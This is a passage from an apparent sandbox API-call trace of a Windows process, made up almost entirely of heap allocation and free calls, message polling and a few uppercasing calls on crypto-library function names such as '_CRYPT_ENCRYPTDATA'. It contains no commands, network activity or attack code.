lpMsg=0x87f36c) returned 0 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10526) returned 0xbea018 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0187.445] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0187.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.446] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0187.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2708 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10526) returned 0xbea018 [0187.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2738 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0187.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26c8 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0187.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0187.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c26d8 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0187.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd438 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0187.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10526) returned 0xa5f008 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0187.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0187.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.450] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90b018 [0187.450] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.450] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0187.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0187.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c28c8 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0187.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0187.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0187.451] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0187.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.452] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0187.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.453] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0187.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0187.454] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0187.454] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0187.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.454] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0187.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0187.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.455] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df118 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0187.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0187.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0187.456] HeapFree (in: hHeap=0x8a0000, 